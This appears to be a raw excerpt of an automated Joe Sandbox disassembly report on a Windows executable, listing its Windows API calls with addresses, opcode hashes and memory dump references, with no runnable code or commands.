                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00851341
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00851349
                                            Similarity
                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                            • String ID:
                                            • API String ID: 1389676194-0
                                            • Opcode ID: 7713ded68f5eb51d4394477d6dabf2b5deaa61a0f1f2ed1234b60ac374f7316e
                                            • Instruction ID: be7e70e2358c9c14302d28e2e1c3bf37ae9eae375e5400c1db398c6bbf934fd9
                                            • Opcode Fuzzy Hash: 7713ded68f5eb51d4394477d6dabf2b5deaa61a0f1f2ed1234b60ac374f7316e
                                            • Instruction Fuzzy Hash: 464108356002059FCB01EF68C991AAEBBF5FF08310B148095E94AAB3A2DB31ED41CB51
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 0083B369
                                            • PostMessageW.USER32(?,00000201,00000001), ref: 0083B413
                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0083B41B
                                            • PostMessageW.USER32(?,00000202,00000000), ref: 0083B429
                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0083B431
                                            Similarity
                                            • API ID: MessagePostSleep$RectWindow
                                            • String ID:
                                            • API String ID: 3382505437-0
                                            • Opcode ID: 33870c3620912eab5e97e47ca3876b639d1884ca054911cc0dba2d3edcbca317
                                            • Instruction ID: a81bcfe2b31b13e6ae873309532babe6e45a397e59a708f58dd3f7af2cf67e79
                                            • Opcode Fuzzy Hash: 33870c3620912eab5e97e47ca3876b639d1884ca054911cc0dba2d3edcbca317
                                            • Instruction Fuzzy Hash: F131AEB190022DEBDF04CF68D94DA9E7BB5FB44329F104229FA21EA2D1C3B09954CB91
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0083DBD7
                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0083DBF4
                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0083DC2C
                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0083DC52
                                            • _wcsstr.LIBCMT ref: 0083DC5C
                                            Similarity
                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                            • String ID:
                                            • API String ID: 3902887630-0
                                            • Opcode ID: 220985e608945bddb31cf2584184dfef3d26c2dcd1c59d7b41f3f4db05b9cb3c
                                            • Instruction ID: 8f8cb16faa95d053943dc779d85086ae624c17d4383550acc27095b0e1b80ca0
                                            • Opcode Fuzzy Hash: 220985e608945bddb31cf2584184dfef3d26c2dcd1c59d7b41f3f4db05b9cb3c
                                            • Instruction Fuzzy Hash: 5021F871214304ABEB159B39EC49E7B7BACFF85760F108029F90ACA191EAA1D84197E0
                                            APIs
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0083BC90
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0083BCC2
                                            • __itow.LIBCMT ref: 0083BCDA
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0083BD00
                                            • __itow.LIBCMT ref: 0083BD11
                                            Similarity
                                            • API ID: MessageSend$__itow
                                            • String ID:
                                            • API String ID: 3379773720-0
                                            • Opcode ID: 076ebde0459a908b01a8a37d3d1c7f3074a3ca51fa04de2164422ef29e076327
                                            • Instruction ID: 3ec48f44be62aad9ff4d27350ec8802cd74eb64fa6b52ec989e7456d5a47c986
                                            • Opcode Fuzzy Hash: 076ebde0459a908b01a8a37d3d1c7f3074a3ca51fa04de2164422ef29e076327
                                            • Instruction Fuzzy Hash: FA21A1B5600218BADB20AA699C46FDE7B68FF99710F101024FA05EB1C2EB70894587E2
                                            APIs
                                              • Part of subcall function 008050E6: _wcsncpy.LIBCMT ref: 008050FA
                                            • GetFileAttributesW.KERNEL32(?,?,?,?,008460C3), ref: 00846369
                                            • GetLastError.KERNEL32(?,?,?,008460C3), ref: 00846374
                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008460C3), ref: 00846388
                                            • _wcsrchr.LIBCMT ref: 008463AA
                                              • Part of subcall function 00846318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008460C3), ref: 008463E0
                                            Similarity
                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                            • String ID:
                                            • API String ID: 3633006590-0
                                            • Opcode ID: da0b440650f1398e64505257b0f758e18b85c0ff25ea2a6869458f1e0d97ca09
                                            • Instruction ID: f9a2d52ab1d9612c16d99476b3c582934649081f4b6ae19b86a958976f2a30f2
                                            • Opcode Fuzzy Hash: da0b440650f1398e64505257b0f758e18b85c0ff25ea2a6869458f1e0d97ca09
                                            • Instruction Fuzzy Hash: E321C33190425D9ADB25AE7CAC46FEA23ACFF17360F100469F045D32D1FB6199D48A67
                                            APIs
                                              • Part of subcall function 0085A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00858BD3
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858BE2
                                            • connect.WSOCK32(00000000,?,00000010), ref: 00858BFE
                                            Similarity
                                            • API ID: ErrorLastconnectinet_addrsocket
                                            • String ID:
                                            • API String ID: 3701255441-0
                                            • Opcode ID: f7b0dc2b93849e6113536617ec5f633981cccb6df1e6631d8e2ace2bfe0a10bb
                                            • Instruction ID: 8ef336f30376dd310db4434267ea442a4f64cb406cc4557cfffcd19cba9b208f
                                            • Opcode Fuzzy Hash: f7b0dc2b93849e6113536617ec5f633981cccb6df1e6631d8e2ace2bfe0a10bb
                                            • Instruction Fuzzy Hash: 38216A312002189FCB50AB6CCC85B7E77A9FF48721F048559F956EB2D2CE74AC058B62
                                            APIs
                                            • IsWindow.USER32(00000000), ref: 00858441
                                            • GetForegroundWindow.USER32 ref: 00858458
                                            • GetDC.USER32(00000000), ref: 00858494
                                            • GetPixel.GDI32(00000000,?,00000003), ref: 008584A0
                                            • ReleaseDC.USER32(00000000,00000003), ref: 008584DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ForegroundPixelRelease
                                            • String ID:
                                            • API String ID: 4156661090-0
                                            • Opcode ID: 6239a89f4235567c019ee906a4ec1b31968c7df225579c20915394c7bb3c17d8
                                            • Instruction ID: cca159aea87b17713a87b1b6a84f9f59e16966244ea7bc97bf0c4df2dedb9fb0
                                            • Opcode Fuzzy Hash: 6239a89f4235567c019ee906a4ec1b31968c7df225579c20915394c7bb3c17d8
                                            • Instruction Fuzzy Hash: F6214275A00204AFDB14EFA8DD85A9EB7E5FF48301F048479E959D7291DB70AD04CB90
                                            APIs
                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                            • SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                            • BeginPath.GDI32(?), ref: 0081B009
                                            • SelectObject.GDI32(?,00000000), ref: 0081B033
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ObjectSelect$BeginCreatePath
                                            • String ID:
                                            • API String ID: 3225163088-0
                                            • Opcode ID: 3c971ee3c819d967adb18c99b46d59ebdf7905dc4599467095ca8581c91944e0
                                            • Instruction ID: 0a70682e3b2d0283e54de7f1d8902ebe8d1d961e3e8deba53c18e0fcb10c6edd
                                            • Opcode Fuzzy Hash: 3c971ee3c819d967adb18c99b46d59ebdf7905dc4599467095ca8581c91944e0
                                            • Instruction Fuzzy Hash: F5215CB0800709EFDF109F59EC88F9A7B7CFF25369F18421AE425D61A1C37088958B91
                                            APIs
                                            • __calloc_crt.LIBCMT ref: 008221A9
                                            • CreateThread.KERNEL32(?,?,008222DF,00000000,?,?), ref: 008221ED
                                            • GetLastError.KERNEL32 ref: 008221F7
                                            • _free.LIBCMT ref: 00822200
                                            • __dosmaperr.LIBCMT ref: 0082220B
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                            • String ID:
                                            • API String ID: 2664167353-0
                                            • Opcode ID: e14aaa05e94f4b3c442d4982025f1b4c5143cf3ea169ed57b541f2e9b5511950
                                            • Instruction ID: 8103ecc07a30ce2e43cb2219742a731798f3eaa2ba872bfa06fcb3042bfcd43f
                                            • Opcode Fuzzy Hash: e14aaa05e94f4b3c442d4982025f1b4c5143cf3ea169ed57b541f2e9b5511950
                                            • Instruction Fuzzy Hash: A611A132104366AF9B11AFAABC41DAB7B98FF05770B100529F914C6192EB72989187A2
                                            APIs
                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                            • GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                            • GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                            • HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 842720411-0
                                            • Opcode ID: bd6726dc7bc58e6ad7c65e7e0298227e88e803a0432c2de792aa7be1347d8816
                                            • Instruction ID: abcb917271f6ce1a88aedc7eedc825884d5dfa8e9d857c9ead2ad8b2d08ce27d
                                            • Opcode Fuzzy Hash: bd6726dc7bc58e6ad7c65e7e0298227e88e803a0432c2de792aa7be1347d8816
                                            • Instruction Fuzzy Hash: AC013C75200304BFDB155FA9EC88DAB7BADFF8A755B100829F945C32A0EA71DC41CBA1
                                            APIs
                                            • CLSIDFromProgID.OLE32 ref: 00839ADC
                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00839AF7
                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 00839B05
                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00839B15
                                            • CLSIDFromString.OLE32(?,?), ref: 00839B21
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                            • String ID:
                                            • API String ID: 3897988419-0
                                            • Opcode ID: 608a9b04ac4513ca68e78ad674aed6700383f7995f66b4c44ea34aa37207555d
                                            • Instruction ID: 4a14fe641e7e34a96617056a77556d2460033d9a9dead16784f5ba8593e2b0d9
                                            • Opcode Fuzzy Hash: 608a9b04ac4513ca68e78ad674aed6700383f7995f66b4c44ea34aa37207555d
                                            • Instruction Fuzzy Hash: D0018F76610229BFDB104F58EC44B9ABBEDFB84362F144434F985D2250E7B0DD009BE0
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847A74
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00847A82
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00847A8A
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00847A94
                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 2733060a8231b61f39c5e346881915d7f86cca63d3acc26cf0e6703474829c27
                                            • Instruction ID: f17b59b0f8c1aae56ab226171ef72722413650f5f4e7b8e5ca38e274f00b81ec
                                            • Opcode Fuzzy Hash: 2733060a8231b61f39c5e346881915d7f86cca63d3acc26cf0e6703474829c27
                                            • Instruction Fuzzy Hash: 89011335D0862DABDF00EFA8E848AEDBB78FF08751F050455E502F2294DB30965487A5
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083AADA
                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAE4
                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAF3
                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAFA
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AB10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: 1fc4bc1d3e8e91d3082287c68764b4344b501082cb5deb635e64191cc93cade4
                                            • Instruction ID: 634db8ef6bc1e1ce9119b70d8014e90efe39ee9d31a3d2986b076f39bd26e8ef
                                            • Opcode Fuzzy Hash: 1fc4bc1d3e8e91d3082287c68764b4344b501082cb5deb635e64191cc93cade4
                                            • Instruction Fuzzy Hash: 9BF06275200308AFEB150FA8EC88E677B6DFF85764F100529F941C7190DB619C01CBA1
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0083AA79
                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0083AA83
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0083AA92
                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0083AA99
                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0083AAAF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: 0b5b425c54cb9891a30bb0052a4519da0b5586f91353c1cad4df7e4d5a893b7d
                                            • Instruction ID: 19aa43834f4580d12ec9047fedba1512ee5898ed1d8efcd2e82b17e74940e761
                                            • Opcode Fuzzy Hash: 0b5b425c54cb9891a30bb0052a4519da0b5586f91353c1cad4df7e4d5a893b7d
                                            • Instruction Fuzzy Hash: 09F062762013146FEB115FA8EC8DE677BACFF89754F100419F941C7190DB619C41CBA1
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EC94
                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0083ECAB
                                            • MessageBeep.USER32(00000000), ref: 0083ECC3
                                            • KillTimer.USER32(?,0000040A), ref: 0083ECDF
                                            • EndDialog.USER32(?,00000001), ref: 0083ECF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                            • String ID:
                                            • API String ID: 3741023627-0
                                            • Opcode ID: 7cb64e62a1777328e03140efcdc7a61f1de343876239c3cee0955f625ddf2878
                                            • Instruction ID: 1aeba2eb23bcc34dc02c85478b157fc0469e0321aad2c4732c2852c2acedf44d
                                            • Opcode Fuzzy Hash: 7cb64e62a1777328e03140efcdc7a61f1de343876239c3cee0955f625ddf2878
                                            • Instruction Fuzzy Hash: AF018130510719ABEB246B54DE4EB9A77B8FF50705F001559B582B14E1EBF0AA56CB80
                                            APIs
                                            • EndPath.GDI32(?), ref: 0081B0BA
                                            • StrokeAndFillPath.GDI32(?,?,0087E680,00000000,?,?,?), ref: 0081B0D6
                                            • SelectObject.GDI32(?,00000000), ref: 0081B0E9
                                            • DeleteObject.GDI32 ref: 0081B0FC
                                            • StrokePath.GDI32(?), ref: 0081B117
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                            • String ID:
                                            • API String ID: 2625713937-0
                                            • Opcode ID: 7d5fbeb48535b78afb43ca8722d8493636e3965f10be2b257c6e2a9dc4317895
                                            • Instruction ID: 23607c282a73d6d2902c4d6b19c28673485617699e1496c3392e9bcfb0b12378
                                            • Opcode Fuzzy Hash: 7d5fbeb48535b78afb43ca8722d8493636e3965f10be2b257c6e2a9dc4317895
                                            • Instruction Fuzzy Hash: E6F0AF34004648ABDF21AF69EC4DB953B79BF22366F088315E469890F2C73589A6DF50
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0084F2DA
                                            • CoCreateInstance.OLE32(0088DA7C,00000000,00000001,0088D8EC,?), ref: 0084F2F2
                                            • CoUninitialize.OLE32 ref: 0084F555
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateInitializeInstanceUninitialize
                                            • String ID: .lnk
                                            • API String ID: 948891078-24824748
                                            • Opcode ID: 0551c978e5d646811b90daed92da81d3c6d14d2f9c811a1cea8c03b5dcc6fd11
                                            • Instruction ID: ef4e7ea6be9a13b01a9a07278c4bde39b96ac9bc2dc20a2ab3f255578d6f806f
                                            • Opcode Fuzzy Hash: 0551c978e5d646811b90daed92da81d3c6d14d2f9c811a1cea8c03b5dcc6fd11
                                            • Instruction Fuzzy Hash: 72A1FAB1104205AFD700EF68CC91DABB7ACFF98714F004A5DF555D7192EB70AA49CB92
                                            APIs
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                            • CoInitialize.OLE32(00000000), ref: 0084E85D
                                            • CoCreateInstance.OLE32(0088DA7C,00000000,00000001,0088D8EC,?), ref: 0084E876
                                            • CoUninitialize.OLE32 ref: 0084E893
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                            • String ID: .lnk
                                            • API String ID: 2126378814-24824748
                                            • Opcode ID: e4989f48bf7873d6d11123351fe1215851eeefcab11427e575f82b720e762553
                                            • Instruction ID: d984620b75251a8ed14876bf078fbfa4dad50bdfc536a9de65a27b6fa871dbde
                                            • Opcode Fuzzy Hash: e4989f48bf7873d6d11123351fe1215851eeefcab11427e575f82b720e762553
                                            • Instruction Fuzzy Hash: D8A134756043059FCB54EF18C88496ABBE5FF88314F148958F99ADB3A2CB31EC45CB92
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 008232ED
                                              • Part of subcall function 0082E0D0: __87except.LIBCMT ref: 0082E10B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 428ade87bdc0558a12e754cdd61477a01528e4f738048e42a73b7a222b5554c5
                                            • Instruction ID: 72e5f80d968188cb5ec9b9b1b3ded179e498c5ec3cde2dc3e1348f176ea471e0
                                            • Opcode Fuzzy Hash: 428ade87bdc0558a12e754cdd61477a01528e4f738048e42a73b7a222b5554c5
                                            • Instruction Fuzzy Hash: F6518C31A08225D6CB15B718F95537A3B98FB40711F248D29F4C6C22E9DF3C8ED89A4B
                                            APIs
                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0089DC50,?,0000000F,0000000C,00000016,0089DC50,?), ref: 00844645
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 008446C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
